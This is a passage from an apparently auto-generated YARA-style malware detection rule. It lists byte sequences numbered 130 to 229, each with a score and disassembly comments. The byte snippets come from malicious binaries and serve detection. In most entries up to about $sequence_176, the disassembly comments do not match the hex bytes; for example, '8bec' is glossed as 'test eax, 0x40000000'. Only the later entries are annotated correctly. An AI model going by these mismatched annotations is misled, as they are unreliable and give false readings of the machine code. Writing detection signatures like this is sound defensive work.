            //   4863d9               | and                 eax, 0x20

        $sequence_130 = { ff15???????? 488bf0 4885c0 0f848e000000 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   488bf0               | dec                 eax
            //   4885c0               | mov                 dword ptr [esp + 0x28], eax
            //   0f848e000000         | dec                 esp

        $sequence_131 = { 8bec 81ec8c0b0000 53 56 57 33ff }
            // n = 6, score = 500
            //   8bec                 | test                eax, 0x40000000
            //   81ec8c0b0000         | je                  0x1d
            //   53                   | and                 eax, 0x80000000
            //   56                   | neg                 eax
            //   57                   | jmp                 0x38
            //   33ff                 | and                 eax, 0x80000000

        $sequence_132 = { 6a00 ff75e8 ff15???????? ff75e8 }
            // n = 4, score = 500
            //   6a00                 | test                eax, 0x40000000
            //   ff75e8               | neg                 eax
            //   ff15????????         |                     
            //   ff75e8               | sbb                 eax, eax

        $sequence_133 = { 488b4db8 4885c9 7406 488b01 ff5010 }
            // n = 5, score = 400
            //   488b4db8             | add                 eax, 0x20
            //   4885c9               | jmp                 0x3b
            //   7406                 | and                 eax, 0x80000000
            //   488b01               | neg                 eax
            //   ff5010               | and                 eax, 0x70

        $sequence_134 = { 488bc1 eb50 488bcf ff15???????? 448bd8 }
            // n = 5, score = 400
            //   488bc1               | jmp                 0x12
            //   eb50                 | and                 eax, 0x80000000
            //   488bcf               | neg                 eax
            //   ff15????????         |                     
            //   448bd8               | sbb                 eax, eax

        $sequence_135 = { ff15???????? 4885c0 740c 33d2 488bc8 }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   4885c0               | dec                 eax
            //   740c                 | mov                 ecx, dword ptr [ecx + 0x10]
            //   33d2                 | dec                 eax
            //   488bc8               | mov                 dword ptr [esp + 0x20], eax

        $sequence_136 = { 884c1464 48ffc2 4883fa02 72e6 }
            // n = 4, score = 400
            //   884c1464             | je                  0x32
            //   48ffc2               | test                eax, 0x40000000
            //   4883fa02             | je                  0x21
            //   72e6                 | mov                 eax, dword ptr [edi]

        $sequence_137 = { 57 8b7d0c 8bd9 89442410 0fb607 35c59d1c81 8b5314 }
            // n = 7, score = 400
            //   57                   | and                 eax, 2
            //   8b7d0c               | add                 eax, 2
            //   8bd9                 | jmp                 0x19
            //   89442410             | sbb                 eax, eax
            //   0fb607               | and                 eax, 0x70
            //   35c59d1c81           | add                 eax, 0x10
            //   8b5314               | jmp                 0x2f

        $sequence_138 = { 4889f9 e8???????? 4889c3 488b06 }
            // n = 4, score = 400
            //   4889f9               | dec                 eax
            //   e8????????           |                     
            //   4889c3               | lea                 ecx, [esp + 0x20]
            //   488b06               | dec                 eax

        $sequence_139 = { 0fb732 488d7a02 33ed 488bd9 6685f6 }
            // n = 5, score = 400
            //   0fb732               | and                 eax, 0x20
            //   488d7a02             | add                 eax, 0x20
            //   33ed                 | jmp                 0x42
            //   488bd9               | and                 eax, 0x80000000
            //   6685f6               | neg                 eax

        $sequence_140 = { 8915???????? 897e04 8b4704 8938 a1???????? 8b00 }
            // n = 6, score = 400
            //   8915????????         |                     
            //   897e04               | and                 eax, 0x80000000
            //   8b4704               | neg                 eax
            //   8938                 | sbb                 eax, eax
            //   a1????????           |                     
            //   8b00                 | and                 eax, 0x20

        $sequence_141 = { 4889f2 4c89f1 e8???????? 4989c4 }
            // n = 4, score = 400
            //   4889f2               | mov                 ecx, ebx
            //   4c89f1               | dec                 eax
            //   e8????????           |                     
            //   4989c4               | mov                 eax, dword ptr [ebx]

        $sequence_142 = { e8???????? 4889f1 e8???????? 4889c2 }
            // n = 4, score = 400
            //   e8????????           |                     
            //   4889f1               | mov                 ecx, edi
            //   e8????????           |                     
            //   4889c2               | dec                 eax

        $sequence_143 = { 4881c4a8000000 415f 415e 415c 5f }
            // n = 5, score = 400
            //   4881c4a8000000       | and                 eax, 0x20
            //   415f                 | add                 eax, 0x20
            //   415e                 | jmp                 0x3e
            //   415c                 | and                 eax, 0x80000000
            //   5f                   | mov                 eax, dword ptr [edi]

        $sequence_144 = { e8???????? 4889d9 e8???????? 488b03 }
            // n = 4, score = 400
            //   e8????????           |                     
            //   4889d9               | mov                 ebx, eax
            //   e8????????           |                     
            //   488b03               | dec                 eax

        $sequence_145 = { 4889d9 e8???????? 85c0 743a }
            // n = 4, score = 400
            //   4889d9               | mov                 eax, dword ptr [esi]
            //   e8????????           |                     
            //   85c0                 | dec                 eax
            //   743a                 | mov                 ecx, esi

        $sequence_146 = { e8???????? 84db 740e 488b0d???????? }
            // n = 4, score = 400
            //   e8????????           |                     
            //   84db                 | and                 eax, 0x80000000
            //   740e                 | neg                 eax
            //   488b0d????????       |                     

        $sequence_147 = { 83ec08 8b08 8900 a1???????? }
            // n = 4, score = 400
            //   83ec08               | and                 eax, 0x20
            //   8b08                 | add                 eax, 0x20
            //   8900                 | jmp                 0x42
            //   a1????????           |                     

        $sequence_148 = { 0105???????? 4881c438080000 5b 5e 5f }
            // n = 5, score = 400
            //   0105????????         |                     
            //   4881c438080000       | mov                 ecx, ebx
            //   5b                   | push                edi
            //   5e                   | push                esi
            //   5f                   | push                ebx

        $sequence_149 = { 33d2 3c73 7508 8b15???????? eb15 3c72 7508 }
            // n = 7, score = 400
            //   33d2                 | test                eax, 0x40000000
            //   3c73                 | je                  0x1d
            //   7508                 | and                 eax, 0x80000000
            //   8b15????????         |                     
            //   eb15                 | neg                 eax
            //   3c72                 | neg                 eax
            //   7508                 | sbb                 eax, eax

        $sequence_150 = { 4889d9 e8???????? 84c0 7518 }
            // n = 4, score = 400
            //   4889d9               | test                eax, eax
            //   e8????????           |                     
            //   84c0                 | je                  0x3c
            //   7518                 | dec                 eax

        $sequence_151 = { 4883c420 5e c3 488b0d???????? }
            // n = 4, score = 400
            //   4883c420             | dec                 eax
            //   5e                   | mov                 eax, dword ptr [ecx]
            //   c3                   | dec                 esp
            //   488b0d????????       |                     

        $sequence_152 = { 884c159c 48ffc2 4883fa0b 72e7 }
            // n = 4, score = 400
            //   884c159c             | je                  0x21
            //   48ffc2               | and                 eax, 0x80000000
            //   4883fa0b             | mov                 eax, dword ptr [edi]
            //   72e7                 | test                eax, 0x20000000

        $sequence_153 = { 4889742418 57 4883ec50 33ff }
            // n = 4, score = 400
            //   4889742418           | dec                 eax
            //   57                   | mov                 dword ptr [esp + 0x38], eax
            //   4883ec50             | dec                 eax
            //   33ff                 | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_154 = { 4885c0 752d eb02 32db ba01000000 }
            // n = 5, score = 400
            //   4885c0               | sbb                 eax, eax
            //   752d                 | and                 eax, 0x70
            //   eb02                 | add                 eax, 0x10
            //   32db                 | add                 eax, 2
            //   ba01000000           | jmp                 0x12

        $sequence_155 = { 84c9 75f9 2bc2 8d7001 e9???????? }
            // n = 5, score = 400
            //   84c9                 | and                 eax, 0x80000000
            //   75f9                 | and                 eax, 0x70
            //   2bc2                 | add                 eax, 0x10
            //   8d7001               | jmp                 0x2a
            //   e9????????           |                     

        $sequence_156 = { 7433 663bce 75ec 4c8bc7 8bd5 4585db 7e1f }
            // n = 7, score = 400
            //   7433                 | sbb                 eax, eax
            //   663bce               | and                 eax, 0x20
            //   75ec                 | add                 eax, 0x20
            //   4c8bc7               | jmp                 0x3e
            //   8bd5                 | and                 eax, 0x80000000
            //   4585db               | neg                 eax
            //   7e1f                 | sbb                 eax, eax

        $sequence_157 = { 4889f9 e8???????? 84c0 7412 }
            // n = 4, score = 400
            //   4889f9               | dec                 eax
            //   e8????????           |                     
            //   84c0                 | mov                 edx, eax
            //   7412                 | dec                 eax

        $sequence_158 = { 488905???????? 488905???????? 488905???????? 488905???????? 488905???????? 488905???????? e8???????? }
            // n = 7, score = 400
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   488905????????       |                     
            //   e8????????           |                     

        $sequence_159 = { 8be5 5d c20800 8b45f4 8b4dfc }
            // n = 5, score = 400
            //   8be5                 | add                 eax, 0x20
            //   5d                   | jmp                 0x42
            //   c20800               | and                 eax, 0x80000000
            //   8b45f4               | add                 eax, 0x20
            //   8b4dfc               | jmp                 0x38

        $sequence_160 = { 488d542460 ff15???????? 85c0 7413 }
            // n = 4, score = 300
            //   488d542460           | dec                 eax
            //   ff15????????         |                     
            //   85c0                 | mov                 dword ptr [esp + 0x30], eax
            //   7413                 | dec                 eax

        $sequence_161 = { 720d 80f920 7408 80c1bf }
            // n = 4, score = 300
            //   720d                 | neg                 eax
            //   80f920               | neg                 eax
            //   7408                 | sbb                 eax, eax
            //   80c1bf               | and                 eax, 2

        $sequence_162 = { ba01000000 488bc8 ff15???????? 488bd8 4885c0 }
            // n = 5, score = 300
            //   ba01000000           | mov                 eax, dword ptr [ecx + 0x20]
            //   488bc8               | dec                 eax
            //   ff15????????         |                     
            //   488bd8               | mov                 edx, dword ptr [ecx + 0x18]
            //   4885c0               | dec                 eax

        $sequence_163 = { e8???????? 83c41c 85c0 0f848a000000 }
            // n = 4, score = 300
            //   e8????????           |                     
            //   83c41c               | add                 esp, 0x1c
            //   85c0                 | test                eax, eax
            //   0f848a000000         | je                  0x90

        $sequence_164 = { 50 897df0 e8???????? 8bf0 85f6 }
            // n = 5, score = 300
            //   50                   | neg                 eax
            //   897df0               | sbb                 eax, eax
            //   e8????????           |                     
            //   8bf0                 | and                 eax, 7
            //   85f6                 | inc                 eax

        $sequence_165 = { 84c0 0f94c1 890d???????? e8???????? }
            // n = 4, score = 300
            //   84c0                 | mov                 dword ptr [esp + 0x38], eax
            //   0f94c1               | dec                 eax
            //   890d????????         |                     
            //   e8????????           |                     

        $sequence_166 = { c1e50a 03eb 8bd5 c1ea06 }
            // n = 4, score = 300
            //   c1e50a               | add                 eax, 2
            //   03eb                 | jmp                 0x17
            //   8bd5                 | and                 eax, 0x80000000
            //   c1ea06               | neg                 eax

        $sequence_167 = { 33c9 c744242000000000 ff15???????? 488905???????? }
            // n = 4, score = 300
            //   33c9                 | mov                 edx, dword ptr [ecx]
            //   c744242000000000     | dec                 esp
            //   ff15????????         |                     
            //   488905????????       |                     

        $sequence_168 = { ba01000000 8bce 448d4205 ff15???????? }
            // n = 4, score = 300
            //   ba01000000           | mov                 edx, dword ptr [ecx]
            //   8bce                 | dec                 esp
            //   448d4205             | mov                 ecx, dword ptr [ecx + 0x28]
            //   ff15????????         |                     

        $sequence_169 = { e8???????? eb05 b857000780 85c0 7907 85ff }
            // n = 6, score = 300
            //   e8????????           |                     
            //   eb05                 | sbb                 eax, eax
            //   b857000780           | and                 eax, 0x20
            //   85c0                 | add                 eax, 0x20
            //   7907                 | jmp                 0x42
            //   85ff                 | and                 eax, 0x80000000

        $sequence_170 = { 4c8905???????? 4889442420 e8???????? 48c705????????07000000 }
            // n = 4, score = 300
            //   4c8905????????         |
            //   4889442420             | dec                 eax
            //   e8????????             |
            //   48c705????????07000000 |

        $sequence_171 = { 488bd7 488d4d80 e8???????? 90 }
            // n = 4, score = 300
            //   488bd7               | dec                 eax
            //   488d4d80             | mov                 edx, dword ptr [ecx + 0x18]
            //   e8????????           |                     
            //   90                   | dec                 eax

        $sequence_172 = { 5e 5b c3 48895c2410 56 }
            // n = 5, score = 300
            //   5e                   | mov                 dword ptr [esp + 0x40], eax
            //   5b                   | dec                 eax
            //   c3                   | mov                 dword ptr [esp + 0x28], eax
            //   48895c2410           | dec                 eax
            //   56                   | mov                 eax, dword ptr [ecx + 0x30]

        $sequence_173 = { e8???????? 85c0 7407 b801000000 eb05 }
            // n = 5, score = 300
            //   e8????????           |                     
            //   85c0                 | js                  0x1d
            //   7407                 | dec                 eax
            //   b801000000           | cwde                
            //   eb05                 | dec                 eax

        $sequence_174 = { 4983c8ff 49ffc0 42381c00 75f7 }
            // n = 4, score = 300
            //   4983c8ff             | dec                 eax
            //   49ffc0               | mov                 edx, dword ptr [ecx + 0x18]
            //   42381c00             | dec                 eax
            //   75f7                 | mov                 ecx, dword ptr [ecx + 0x10]

        $sequence_175 = { 48c1f803 4c2bf8 498bd7 e8???????? }
            // n = 4, score = 300
            //   48c1f803             | mov                 eax, dword ptr [ecx]
            //   4c2bf8               | dec                 esp
            //   498bd7               | mov                 eax, dword ptr [ecx + 0x20]
            //   e8????????           |                     

        $sequence_176 = { 8bec 56 57 6a04 ff15???????? }
            // n = 5, score = 200
            //   8bec                 | je                  0x2b
            //   56                   | test                eax, 0x40000000
            //   57                   | je                  0x1a
            //   6a04                 | and                 eax, 0x80000000
            //   ff15????????         |                     

        $sequence_177 = { 53 53 6aff 50 53 53 ff15???????? }
            // n = 7, score = 200
            //   53                   | push                ebx
            //   53                   | push                ebx
            //   6aff                 | push                -1
            //   50                   | push                eax
            //   53                   | push                ebx
            //   53                   | push                ebx
            //   ff15????????         |                     

        $sequence_178 = { e8???????? 4585ff 0f85d2000000 c78424a400000074656d44 c78424b000000063617065 }
            // n = 5, score = 200
            //   e8????????             |
            //   4585ff                 | pop                 esi
            //   0f85d2000000           | pop                 edi
            //   c78424a400000074656d44 | dec                 eax
            //   c78424b000000063617065 | test                ecx, ecx

        $sequence_179 = { 8d45f4 c60668 50 8d4601 50 e8???????? }
            // n = 6, score = 200
            //   8d45f4               | lea                 eax, [ebp - 0xc]
            //   c60668               | mov                 byte ptr [esi], 0x68
            //   50                   | push                eax
            //   8d4601               | lea                 eax, [esi + 1]
            //   50                   | push                eax
            //   e8????????           |                     

        $sequence_180 = { c744242801000000 4533c9 895c2420 4533c0 8d5301 8d4b02 ff15???????? }
            // n = 7, score = 200
            //   c744242801000000     | mov                 eax, dword ptr [ecx + 0x38]
            //   4533c9               | dec                 eax
            //   895c2420             | mov                 dword ptr [esp + 0x28], eax
            //   4533c0               | dec                 eax
            //   8d5301               | mov                 eax, dword ptr [ecx + 0x30]
            //   8d4b02               | dec                 eax
            //   ff15????????         |                     

        $sequence_181 = { eb20 488b942430080000 488d0d11230000 e8???????? }
            // n = 4, score = 200
            //   eb20                 | push                edi
            //   488b942430080000     | push                esi
            //   488d0d11230000       | push                ebx
            //   e8????????           |                     

        $sequence_182 = { 80f90d 7418 80f90a 7413 }
            // n = 4, score = 200
            //   80f90d               | cmp                 cl, 0xd
            //   7418                 | je                  0x1a
            //   80f90a               | cmp                 cl, 0xa
            //   7413                 | je                  0x15

        $sequence_183 = { 85c0 0f85f7000000 488b5f10 33c0 488945f2 33c9 44897df0 }
            // n = 7, score = 200
            //   85c0                 | test                eax, eax
            //   0f85f7000000         | jne                 0xfd
            //   488b5f10             | mov                 rbx, qword ptr [rdi + 0x10]
            //   33c0                 | xor                 eax, eax
            //   488945f2             | mov                 qword ptr [rbp - 0xe], rax
            //   33c9                 | xor                 ecx, ecx
            //   44897df0             | mov                 dword ptr [rbp - 0x10], r15d

        $sequence_184 = { 4889ca 4c89442428 4889d9 ff15???????? 48833d????????00 4889d9 }
            // n = 6, score = 200
            //   4889ca               | mov                 rdx, rcx
            //   4c89442428           | mov                 qword ptr [rsp + 0x28], r8
            //   4889d9               | mov                 rcx, rbx
            //   ff15????????         |                     
            //   48833d????????00     |                     
            //   4889d9               | mov                 rcx, rbx

        $sequence_185 = { 50 6a09 ff15???????? 50 ff15???????? 8bf8 }
            // n = 6, score = 200
            //   50                   | push                eax
            //   6a09                 | push                9
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax

        $sequence_186 = { c78424b4000000642e6578 c78424a000000025537973 488d9424a0000000 488dac24b0010000 }
            // n = 4, score = 200
            //   c78424b4000000642e6578     | mov                 dword ptr [rsp + 0xb4], 0x78652e64
            //   c78424a000000025537973     | mov                 dword ptr [rsp + 0xa0], 0x73795325
            //   488d9424a0000000     | lea                 rdx, [rsp + 0xa0]
            //   488dac24b0010000     | lea                 rbp, [rsp + 0x1b0]

        $sequence_187 = { e8???????? 83c448 8d4614 6a03 68???????? }
            // n = 5, score = 200
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   8d4614               | lea                 eax, [esi + 0x14]
            //   6a03                 | push                3
            //   68????????           |                     

        $sequence_188 = { 0fb64101 41884001 0fb64102 41884002 0fb64103 41884003 4180f905 }
            // n = 7, score = 200
            //   0fb64101             | movzx               eax, byte ptr [rcx + 1]
            //   41884001             | mov                 byte ptr [r8 + 1], al
            //   0fb64102             | movzx               eax, byte ptr [rcx + 2]
            //   41884002             | mov                 byte ptr [r8 + 2], al
            //   0fb64103             | movzx               eax, byte ptr [rcx + 3]
            //   41884003             | mov                 byte ptr [r8 + 3], al
            //   4180f905             | cmp                 r9b, 5

        $sequence_189 = { e8???????? eb24 3d36040000 757a 89f0 8d7001 }
            // n = 6, score = 200
            //   e8????????           |                     
            //   eb24                 | jmp                 0x26
            //   3d36040000           | cmp                 eax, 0x436
            //   757a                 | jne                 0x7c
            //   89f0                 | mov                 eax, esi
            //   8d7001               | lea                 esi, [eax + 1]

        $sequence_190 = { 0f1f840000000000 c60100 8d4901 83ee01 }
            // n = 4, score = 200
            //   0f1f840000000000     | nop                 dword ptr [eax + eax]
            //   c60100               | mov                 byte ptr [ecx], 0
            //   8d4901               | lea                 ecx, [ecx + 1]
            //   83ee01               | sub                 esi, 1

        $sequence_191 = { ff15???????? 8bc8 898d08ffffff 85c9 }
            // n = 4, score = 200
            //   ff15????????         |                     
            //   8bc8                 | mov                 ecx, eax
            //   898d08ffffff         | mov                 dword ptr [ebp - 0xf8], ecx
            //   85c9                 | test                ecx, ecx

        $sequence_192 = { 50 8d461a 50 e8???????? 83c448 66c7461effd0 }
            // n = 6, score = 200
            //   50                   | push                eax
            //   8d461a               | lea                 eax, [esi + 0x1a]
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   66c7461effd0         | mov                 word ptr [esi + 0x1e], 0xd0ff

        $sequence_193 = { 50 8d4627 50 e8???????? 83c448 66c7462bffd0 }
            // n = 6, score = 200
            //   50                   | push                eax
            //   8d4627               | lea                 eax, [esi + 0x27]
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c448               | add                 esp, 0x48
            //   66c7462bffd0         | mov                 word ptr [esi + 0x2b], 0xd0ff

        $sequence_194 = { 8b451c a3???????? 8b4520 a3???????? }
            // n = 4, score = 200
            //   8b451c               | mov                 eax, dword ptr [ebp + 0x1c]
            //   a3????????           |                     
            //   8b4520               | mov                 eax, dword ptr [ebp + 0x20]
            //   a3????????           |                     

        $sequence_195 = { 3d12500000 0f95c0 84c0 0f841b020000 c745f400000000 837df400 }
            // n = 6, score = 100
            //   3d12500000           | cmp                 eax, 0x5012
            //   0f95c0               | setne               al
            //   84c0                 | test                al, al
            //   0f841b020000         | je                  0x221
            //   c745f400000000       | mov                 dword ptr [ebp - 0xc], 0
            //   837df400             | cmp                 dword ptr [ebp - 0xc], 0

        $sequence_196 = { ff15???????? 50 ff15???????? 898540feffff 68???????? 68???????? ff15???????? }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   898540feffff         | mov                 dword ptr [ebp - 0x1c0], eax
            //   68????????           |                     
            //   68????????           |                     
            //   ff15????????         |                     

        $sequence_197 = { e8???????? 85c0 0f84c6faffff 8b45f8 50 e8???????? }
            // n = 6, score = 100
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   0f84c6faffff         | je                  0xfffffacc
            //   8b45f8               | mov                 eax, dword ptr [ebp - 8]
            //   50                   | push                eax
            //   e8????????           |                     

        $sequence_198 = { 7e2c bb01000000 53 8bc7 b901000000 8b15???????? }
            // n = 6, score = 100
            //   7e2c                 | jle                 0x2e
            //   bb01000000           | mov                 ebx, 1
            //   53                   | push                ebx
            //   8bc7                 | mov                 eax, edi
            //   b901000000           | mov                 ecx, 1
            //   8b15????????         |                     

        $sequence_199 = { 894db4 8b55b4 83c201 89959cfeffff }
            // n = 4, score = 100
            //   894db4               | mov                 dword ptr [ebp - 0x4c], ecx
            //   8b55b4               | mov                 edx, dword ptr [ebp - 0x4c]
            //   83c201               | add                 edx, 1
            //   89959cfeffff         | mov                 dword ptr [ebp - 0x164], edx

        $sequence_200 = { ff75dc 8d8578fcffff 68???????? 50 ff15???????? 8b45fc 8d9518ffffff }
            // n = 7, score = 100
            //   ff75dc               | push                dword ptr [ebp - 0x24]
            //   8d8578fcffff         | lea                 eax, [ebp - 0x388]
            //   68????????           |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8b45fc               | mov                 eax, dword ptr [ebp - 4]
            //   8d9518ffffff         | lea                 edx, [ebp - 0xe8]

        $sequence_201 = { c645f100 8b4da0 51 68???????? 8b55ec }
            // n = 5, score = 100
            //   c645f100             | mov                 byte ptr [ebp - 0xf], 0
            //   8b4da0               | mov                 ecx, dword ptr [ebp - 0x60]
            //   51                   | push                ecx
            //   68????????           |                     
            //   8b55ec               | mov                 edx, dword ptr [ebp - 0x14]

        $sequence_202 = { 83c408 eb18 81ff01030000 7d10 }
            // n = 4, score = 100
            //   83c408               | add                 esp, 8
            //   eb18                 | jmp                 0x1a
            //   81ff01030000         | cmp                 edi, 0x301
            //   7d10                 | jge                 0x12

        $sequence_203 = { 50 8b45ec 50 e8???????? 8b5de8 33c0 }
            // n = 6, score = 100
            //   50                   | push                eax
            //   8b45ec               | mov                 eax, dword ptr [ebp - 0x14]
            //   50                   | push                eax
            //   e8????????           |                     
            //   8b5de8               | mov                 ebx, dword ptr [ebp - 0x18]
            //   33c0                 | xor                 eax, eax

        $sequence_204 = { 12f7 5d 12f7 f30a6b5d }
            // n = 4, score = 100
            //   12f7                 | adc                 dh, bh
            //   5d                   | pop                 ebp
            //   12f7                 | adc                 dh, bh
            //   f30a6b5d             | or                  ch, byte ptr [ebx + 0x5d]

        $sequence_205 = { 83c408 85c0 0f85d4020000 83bdc0feffff00 }
            // n = 4, score = 100
            //   83c408               | add                 esp, 8
            //   85c0                 | test                eax, eax
            //   0f85d4020000         | jne                 0x2da
            //   83bdc0feffff00       | cmp                 dword ptr [ebp - 0x140], 0

        $sequence_206 = { e9???????? 837d1001 7e1b c744243810000000 }
            // n = 4, score = 100
            //   e9????????           |                     
            //   837d1001             | cmp                 dword ptr [ebp + 0x10], 1
            //   7e1b                 | jle                 0x1d
            //   c744243810000000     | mov                 dword ptr [esp + 0x38], 0x10

        $sequence_207 = { 53 ff15???????? 53 8bf0 ff15???????? ff15???????? 3dcbd41200 }
            // n = 7, score = 100
            //   53                   | push                ebx
            //   ff15????????         |                     
            //   53                   | push                ebx
            //   8bf0                 | mov                 esi, eax
            //   ff15????????         |                     
            //   ff15????????         |                     
            //   3dcbd41200           | cmp                 eax, 0x12d4cb

        $sequence_208 = { 52 8d55b8 52 8b08 6a01 }
            // n = 5, score = 100
            //   52                   | push                edx
            //   8d55b8               | lea                 edx, [ebp - 0x48]
            //   52                   | push                edx
            //   8b08                 | mov                 ecx, dword ptr [eax]
            //   6a01                 | push                1

        $sequence_209 = { c6041000 b901000000 6bd100 8b85ecfeffff c6041000 b901000000 }
            // n = 6, score = 100
            //   c6041000             | mov                 byte ptr [eax + edx], 0
            //   b901000000           | mov                 ecx, 1
            //   6bd100               | imul                edx, ecx, 0
            //   8b85ecfeffff         | mov                 eax, dword ptr [ebp - 0x114]
            //   c6041000             | mov                 byte ptr [eax + edx], 0
            //   b901000000           | mov                 ecx, 1

        $sequence_210 = { 8945a8 8b45a8 85c0 7908 }
            // n = 4, score = 100
            //   8945a8               | mov                 dword ptr [ebp - 0x58], eax
            //   8b45a8               | mov                 eax, dword ptr [ebp - 0x58]
            //   85c0                 | test                eax, eax
            //   7908                 | jns                 0xa

        $sequence_211 = { 8b4c2420 8b7c2410 d9c0 c744247c01000000 d8f2 }
            // n = 5, score = 100
            //   8b4c2420             | mov                 ecx, dword ptr [esp + 0x20]
            //   8b7c2410             | mov                 edi, dword ptr [esp + 0x10]
            //   d9c0                 | fld                 st(0)
            //   c744247c01000000     | mov                 dword ptr [esp + 0x7c], 1
            //   d8f2                 | fdiv                st(0), st(2)

        $sequence_212 = { c645cc8b c645cdfe c645ceef c645cf8c c645d023 c645d199 }
            // n = 6, score = 100
            //   c645cc8b             | mov                 byte ptr [ebp - 0x34], 0x8b
            //   c645cdfe             | mov                 byte ptr [ebp - 0x33], 0xfe
            //   c645ceef             | mov                 byte ptr [ebp - 0x32], 0xef
            //   c645cf8c             | mov                 byte ptr [ebp - 0x31], 0x8c
            //   c645d023             | mov                 byte ptr [ebp - 0x30], 0x23
            //   c645d199             | mov                 byte ptr [ebp - 0x2f], 0x99

        $sequence_213 = { d9ee d9c9 83c301 dfe9 ddd8 }
            // n = 5, score = 100
            //   d9ee                 | fldz                
            //   d9c9                 | fxch                st(1)
            //   83c301               | add                 ebx, 1
            //   dfe9                 | fucomip             st(0), st(1)
            //   ddd8                 | fstp                st(0)

        $sequence_214 = { 33f6 8bc7 e8???????? 5e 33c0 }
            // n = 5, score = 100
            //   33f6                 | xor                 esi, esi
            //   8bc7                 | mov                 eax, edi
            //   e8????????           |                     
            //   5e                   | pop                 esi
            //   33c0                 | xor                 eax, eax

        $sequence_215 = { 61 34aa 8bdf 56 }
            // n = 4, score = 100
            //   61                   | popal               
            //   34aa                 | xor                 al, 0xaa
            //   8bdf                 | mov                 ebx, edi
            //   56                   | push                esi

        $sequence_216 = { 61 34aa 3611fe 3611fe 3611fe }
            // n = 5, score = 100
            //   61                   | popal               
            //   34aa                 | xor                 al, 0xaa
            //   3611fe               | adc                 esi, edi
            //   3611fe               | adc                 esi, edi
            //   3611fe               | adc                 esi, edi

        $sequence_217 = { 68e9fd0000 ff15???????? 8bf0 85f6 7506 5f 5e }
            // n = 7, score = 100
            //   68e9fd0000           | push                0xfde9
            //   ff15????????         |                     
            //   8bf0                 | mov                 esi, eax
            //   85f6                 | test                esi, esi
            //   7506                 | jne                 8
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi

        $sequence_218 = { 837c241400 7c06 ff15???????? 85f6 }
            // n = 4, score = 100
            //   837c241400           | cmp                 dword ptr [esp + 0x14], 0
            //   7c06                 | jl                  8
            //   ff15????????         |                     
            //   85f6                 | test                esi, esi

        $sequence_219 = { 57 2ac8 57 2ac8 57 2ac8 }
            // n = 6, score = 100
            //   57                   | push                edi
            //   2ac8                 | sub                 cl, al
            //   57                   | push                edi
            //   2ac8                 | sub                 cl, al
            //   57                   | push                edi
            //   2ac8                 | sub                 cl, al

        $sequence_220 = { 898554feffff 0fb64df3 85c9 7520 8b95a0feffff 83ea01 3955c4 }
            // n = 7, score = 100
            //   898554feffff         | mov                 dword ptr [ebp - 0x1ac], eax
            //   0fb64df3             | movzx               ecx, byte ptr [ebp - 0xd]
            //   85c9                 | test                ecx, ecx
            //   7520                 | jne                 0x22
            //   8b95a0feffff         | mov                 edx, dword ptr [ebp - 0x160]
            //   83ea01               | sub                 edx, 1
            //   3955c4               | cmp                 dword ptr [ebp - 0x3c], edx

        $sequence_221 = { 6a08 ff15???????? 50 ff15???????? 5f 5e }
            // n = 6, score = 100
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi

        $sequence_222 = { 837c242439 0f8458ffffff 8b442444 c744242820000000 83c031 }
            // n = 5, score = 100
            //   837c242439           | cmp                 dword ptr [esp + 0x24], 0x39
            //   0f8458ffffff         | je                  0xffffff5e
            //   8b442444             | mov                 eax, dword ptr [esp + 0x44]
            //   c744242820000000     | mov                 dword ptr [esp + 0x28], 0x20
            //   83c031               | add                 eax, 0x31

        $sequence_223 = { 8b85acefffff e8???????? 50 6801000080 e8???????? 85c0 0f8544050000 }
            // n = 7, score = 100
            //   8b85acefffff         | mov                 eax, dword ptr [ebp - 0x1054]
            //   e8????????           |                     
            //   50                   | push                eax
            //   6801000080           | push                0x80000001
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   0f8544050000         | jne                 0x54a

        $sequence_224 = { 899580feffff c645fc02 8b8580feffff 50 8d8da8feffff e8???????? }
            // n = 6, score = 100
            //   899580feffff         | mov                 dword ptr [ebp - 0x180], edx
            //   c645fc02             | mov                 byte ptr [ebp - 4], 2
            //   8b8580feffff         | mov                 eax, dword ptr [ebp - 0x180]
            //   50                   | push                eax
            //   8d8da8feffff         | lea                 ecx, [ebp - 0x158]
            //   e8????????           |                     

        $sequence_225 = { 61 34aa dccb 6a61 34aa 61 34aa }
            // n = 7, score = 100
            //   61                   | popal               
            //   34aa                 | xor                 al, 0xaa
            //   dccb                 | fmul                st(3), st(0)
            //   6a61                 | push                0x61
            //   34aa                 | xor                 al, 0xaa
            //   61                   | popal               
            //   34aa                 | xor                 al, 0xaa

        $sequence_226 = { ff75f4 51 8b11 ff521c }
            // n = 4, score = 100
            //   ff75f4               | push                dword ptr [ebp - 0xc]
            //   51                   | push                ecx
            //   8b11                 | mov                 edx, dword ptr [ecx]
            //   ff521c               | call                dword ptr [edx + 0x1c]

        $sequence_227 = { e8???????? 48 85c0 0f8c9d050000 40 8945c0 33f6 }
            // n = 7, score = 100
            //   e8????????           |                     
            //   48                   | dec                 eax
            //   85c0                 | test                eax, eax
            //   0f8c9d050000         | jl                  0x5a3
            //   40                   | inc                 eax
            //   8945c0               | mov                 dword ptr [ebp - 0x40], eax
            //   33f6                 | xor                 esi, esi

        $sequence_228 = { 79f9 89651c 83c8ff 8be5 5d }
            // n = 5, score = 100
            //   79f9                 | jns                 0xfffffffb
            //   89651c               | mov                 dword ptr [ebp + 0x1c], esp
            //   83c8ff               | or                  eax, 0xffffffff
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp

        $sequence_229 = { 83c404 8b45f8 8a4418ff 8b17 88441aff }
            // n = 5, score = 100
            //   83c404               | add                 esp, 4
